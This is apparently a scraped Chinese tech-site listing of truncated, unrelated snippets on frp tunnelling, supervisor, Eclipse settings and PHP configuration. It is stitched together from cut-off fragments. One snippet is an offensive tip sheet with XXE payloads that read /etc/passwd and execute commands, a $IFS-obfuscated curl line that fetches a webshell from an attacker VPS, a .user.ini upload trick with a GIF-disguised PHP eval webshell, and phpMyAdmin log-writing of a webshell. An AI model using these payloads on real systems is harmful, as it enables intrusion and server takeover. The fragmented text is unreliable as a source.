21篇测试必备的Linux常用命令,每天敲一篇,每次敲三遍,每月一循环,全都可记住!!
简单记录一下frp的部署和基本用法,主要是因为今天自己切实享受到了frp带来的便利= =
四、php操作memcached 4.1、安装扩展 4.1.1、linux下安装扩展 PHP Memcache 扩展包下载地址:http://pecl.php.net/package-search.p
在Linux中rm -rf的威力是十分巨大的,特别是附带了 -f 参数,不少新手都干过用root用户执行 rm -rf /命令这种傻事,如果云服务器没有快照,简直就是灾难,从根目录开始所有文件被递归删除,连系统都被损坏。
frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。
幻兽帕鲁部署完成之后,如果您想要按照自己的喜好来对游戏世界进行DIY,打造个性化的,那么就需要通过配置游戏参数来完成。最近一段时间,这一步可谓是让众多玩家
WorkerMan实际上就是一个PHP代码包,如果你的PHP环境已经装好,只需要把WorkerMan源代码或者demo下载下来即可运行。
使用配置文件来灵活的配置一些参数是一件很常见的事情,配置文件的解析并不复杂,在python里更是如此,在官方发布的库中就包含有做这件事情的库,那就是configParser
Ansible playbook允许用户使用自定义的变量,不过当变量过大,或者太复杂时,无论是在playbbok中通过vars定义,还是在单独的变量文件中定义,可读性都比较差,而且不够灵活。
1.本地代码传输至 Linux /opt 下(目录自定义) # settings 配置 # django项目需要配置allow_hosts=['*'],允许所有主机访问 # debug=True #返回给项目一个debug信息,暴露了项目配置信息,因此在线上要关闭 2.环境准备 2.1虚拟环境 # 准备一个独立的虚拟环境 mkvirtualenv luffy_even 2.2解释器环境搬运 # 本地 pip3 freeze > requirements.py # 服务器 pip3 install -r r
从https://github.com/fatedier/frp/releases 下载最新版本的frp压缩包。因为是两种系统,所以把linux和windows的版本都下载了一份。
Superviosr是一个UNIX-like系统上的进程监控工具,是一个Python开发的client/server系统,可以管理和监控unix上面的进程。同daemontools一样,它也不能监控daemon进程。
使用electron-vue框架,跑起来项目, 参考地址: https://simulatedgreg.gitbooks.io/electron-vue/content/cn/ 跑起来长这样
-vmargs -Xms128M -Xmx512M -XX:PermSize=64M -XX:MaxPermSize=128M
成功读取出来。从nmap中我们知道这是apache的,我们看看读日志文件。/var/log/nginx/access.log
PHP是一种开源服务器端脚本语言,应用很广泛。Apache web服务器提供了这种便利:通过HTTP或HTTPS协议,访问文件和内容。配置不当的服务器端脚本语言会带来各种各样的问题。所以,使用php时要小心。以下是Linux下PHP+Apache的26个PHP程序员必知的安全方面的设置
在zabbix-server端配置Freetds、unixODBC、unixODBC-devel
通过 getconf LONG_BIT Linux查看系统位数命令:返回的结果如果是64,说明linux系统属于64位;返回32,系统属于32位。
frp frp 是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp, http, https 协议
MySQL max_allowed_packet 设置过小导致记录写入失败 mysql根据配置文件会限制server接受的数据包大小。 有时候大的插入和更新会受max_allowed_packet 参数限制,导致写入或者更新失败。 查看目前配置 show VARIABLES like '%max_allowed_packet%'; 显示的结果为: +--------------------+---------+ | Variable_name | Value | +--------------
和SQL注入等攻击方式一样,文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。
平常的ini配置文件只能读取,但是这个库不光可以读取、写入配置项,还能给配置项写注释。只有一个hpp头文件,不需要编译,支持C++11及之后版本。
SQL Message: backup could not be completed: [2000004] Cannot open file ""<root>/.COMPLETE_DATA_BACKUP_20220721_databackup_0_1" ((closed,mode= W, access= rw-r-----, flags= DIRECT|TRUNCATE|MULTI_WRITERS|UNALIGNED_SIZE), factory= (root= "/hana_export/HDB_Backup/" Permission denied
一.漏洞描述 文件包含漏洞主要是程序员把一些公用的代码写在一个单独的文件中,然后使用其他文件进行包含调用,如果需要包含的文件是使用硬编码的,那么一般是不会出现安全问题,但是有时可能不确定需要包含哪些具体文件,所以就会采用变量的形式来传递需要包含的文件,但是在使用包含文件的过程中,未对包含的变量进行检查及过滤,导致外部提交的恶意数据作为变量进入到了文件包含的过程中,从而导致提交的恶意数据被执行,主要用来绕过waf上传木马文件。 二.漏洞分类 0x01本地文件包含:可以包含本地文件,在条件
使用PyCharm内置的包管理修改默认源为豆瓣源后出现报错: “The repository located at pypi.douban.com is not a trusted or secure host and is being ignored”
frp 是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp 协议,为 http 和 https 应用协议提供了额外的能力,且尝试性支持了点对点穿透。
欢迎大家使用天兔数据库监控系统(以下简称为Lepus)。Lepus是一套开源的数据库监控平台,目前已经支持MySQL、Oracle、PostgresQL、GreatSQL、MongoDB、Redis等数据库的基本监控和告警。Lepus无需在每台数据库服务器部署脚本或Agent,只需要在数据库创建授权帐号后,即可进行远程监控,适合监控数据库服务器较多的公司和监控云中数据库,这将为企业大大减化监控部署流程,同时Lepus系统内置了丰富的性能监控指标,让企业能够在数据库宕机前发现潜在性能问题进行处理,减少企业因为数据库问题导致的直接损失。
如果你还是找不到php.ini或者找到了php.ini修改后不生效(其实是没找对),请使用如下办法: 1.新建php文件,写入如下代码
1.3、XXE相关技巧 1.3.1、XXE载荷构技巧 使用seclists的XXE-Fuzzing.txt的第9行,做一个简单改造即可使用。对比如下: 改造前: <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 改造后: <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "file:///etc/passwd" >]> XXE-Fuzzing.txt的路径:SecLists\Fuzzing\XXE-Fuzzing.txt 有了上述载荷以后,再加上回显位置即可成功利用,完整载荷示例: <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "file:///etc/passwd" >]> <name> <email> &foo; </email> </name> 1.3.2、命令执行&&getshell 命令执行的原理是把文件读取用的file://协议换成了expect://协议。 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "expect://id" >]> <name> <email> &foo; </email> </name> getshell则是命令执行的变种,通过上传webshell来。 利用前提:知道目标服务器的脚本语言类型和webshell上传后的大致位置。如果是OSS上,直接寄。 1)使用python托管webshell python -m http.server 8088 2)下载webshell <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "expect://curl$IFS'vps_addr:port/111.php'$IFS-o$IFS'222.php'" >]> <name> <email> &foo; </email> </name> 此处webshell下载解析: curl -O vps_addr:port/111.php curl vps_addr:port/111.php -o 222.php 空格用$IFS来替代,没啥好说的,常规思路。 下载url不能带协议 下载url用单引号包裹,如果是-o方式,保存文件的名称也用单引号包裹起来。 1.4、.user.ini文件上传 这个跟.htaccess差不多,.user.ini是php给用户的自定义配置文件,可将指定文件按照php脚本文件的形式解析。 介绍:https://blog.csdn.net/cosmoslin/article/details/120793126 利用过程: 1)上传.user.ini filename:.user.ini Content-type:image/jpeg 文件正文: GIF89a auto_prepend_file = aaa.jpg 2)上传webshell filename: aaa.jpg Content-type:image/jpeg 文件正文: GIF89a <?php @eval($_POST[22]);?> # 可替换为其他webshell 1.5、盲注分析 导出数据包: 文件——导出分组解析结果——为纯文本 通过notepad++解码: 提取所有注入数据包,此处使用notepad++中的标记功能,查找模式设置为正则表达式。 提取出来以后,找到临界值。当上面的查询语句从1,1到2,1,则上一条语句的=''的值就是SQLi获取到的数据。 找到所有数据后,用英文的逗号隔开,然后使用convert从dec转成text。 1.6、phpmyadmin后台写日志马 前提:知道web根目录。 set global general_log = 'on'; set global general_log_file = 'c:/phpstudy/111.php' select "<?php @eval($_POST[22]);?>" web根目
目前个人认为配置和使用上是最方便的内网穿透工具,已经用了快两年了,拿来穿透进没有公网的位于学校宿舍的路由器,蹭蹭百度文库企业账号和知网之类的23333
本文章介绍了如何在一台LightHouse服务器上搭建FRP内网穿透服务,来方便穿透在家中的服务。
进程监控工具supervisor 启动Mongodb 一什么是supervisor Superviosr是一个UNIX-like系统上的进程监控工具。 Supervisor是一个Python开发的client/server系统,可以管理和监控*nix上面的进程。不过同daemontools一样,它也不能监控daemon进程 官网:http://supervisord.org/ 二为啥用supervisor 部署简单 : 为啥简单呢?因为咱们通常管理linux进程的时候,一般来说都需要自己编写一个能够实现
在环境部署问题上,我们经历了3个阶段:传统安装、镜像恢复、自动发现注册+指令下达。目前镜像恢复后,启动虚拟机,一旦能ping通我们公司地址,就会自动注册这台机器(即使没有其他外网访问权限、也未开放任何对外端口),我们也就有了这台机器的管理权限,可批量群控下发指令。(第二阶段、第三阶段均为我自主设计。)
如上图,目标开启了22、80、81和6379端口。 对目标192.168.1.129进行目录爆破:
那个,今天 17 号了,马上也该回家了,考虑到在家里可能有时挺无聊的,我就想着能不能在学校的服务器上穿个洞,这样在家里也可以访问到学校 4 路泰坦的服务器,就可以继续学习深度学习了,说干就干,很早就有这个想法了,要是成功的话,以后出去打比赛也可以用显卡训练模型,多爽
Mumble是一款开源语音通信应用程序,具有可自定义的游戏覆盖图,应用程序外观,对话记录和高级语音活动检测功能。
linux的配置文件基本都是config格式的配置文件,所以专门查了一下python操作config的方法,总结记录一下(有时间在总结configobj模块的config格式文件操作方法)
最近写了很多围绕软件测试从业者的经验文、成长文;如果不去思考、总结、反思、落地到实际工作中,看了再多,也没啥用 。
这里需要注意的是,nginx中的 location /account 要和你在django中的地址一致,即django 和nginx是可以找到的路由
服务端需要公网环境,一般用一台云服务器就行了,我选择的是 Linux 服务器,Windows 服务器也是可以的。
哈喽大家好,近期我们Sine安全对客户平台进行渗透测试的时候,发现有一些命令执行的漏洞测试语句和函数,导致服务器被提权被入侵,上一节提到XSS跨站脚本攻击检测方法,本章来总和一下脚本执行命令的详细检测手段,以及绕过waf的办法,只有这样详细的对平台进行安全测试才能保障整个平台安全稳定。
python web服务器开发使用WSGI协议(Web Server Gateway Interface)
swoole框架是一个很神奇很厉害的框架,它弥补了PHP的本身的一些不足之处。其实swoole确切的说是一个使用C语言编写的PHP扩展,并且这个扩展不能够在windows系统使用,但是就目前的开发环境来说还是使用windows的程序员比较多。那怎么样才能够在windows系统来开发使用swoole扩展呢?当然我们可以使用vm做个虚拟机然后搭建linux环境,但是这样做的话只能是要么在虚拟机中编写代码要么就只能在windows编写好之后拷贝到虚拟机中啦!对于我来说我觉得太麻烦啦,于是问了问度娘发现了cgywin这个东西,引用百度百科上面的介绍“Cygwin是一个在windows平台上运行的类UNIX模拟环境”,既然是个模拟环境那就好办啦!接下来我们正式开始讲讲怎么搭建swoole环境
大家都知道,如果一个服务器接入大量的进程或者任务,很可能会造成卡顿,比如在使用EasyNVR进行视频直播分发时,nginx接入传输量比较大的视频流,会导致PC端的播放卡顿。
-vmargs -Xms128M -Xmx512M -XX:PermSize=64M -XX:MaxPermSize=128M 这里有几个问题: 1. 各个参数的含义什么? 2. 为什么有的机器我将-Xmx和-XX:MaxPermSize都设置为512M之后Eclipse可以启动,而有些机器无法启动? 3. 为何将上面的参数写入到eclipse.ini文件Eclipse没有执行对应的设置? 下面我们一一进行回答 1. 各个参数的含义什么?
-vmargs -Xms128M -Xmx512M -XX:PermSize=64M -XX:MaxPermSize=128M 这里有几个问题: 1. 各个参数的含义什么? 2. 为什么有的机器我将-Xmx和-XX:MaxPermSize都设置为512M之后Eclipse可以启动,而有些机器无法启动? 3. 为何将上面的参数写入到eclipse.ini文件Eclipse没有执行对应的设置? 下面我们一一进行回答 1. 各个参数的含义什么? 参数中-vmargs的意思是设置JVM参数
领取专属 10元无门槛券
手把手带您无忧上云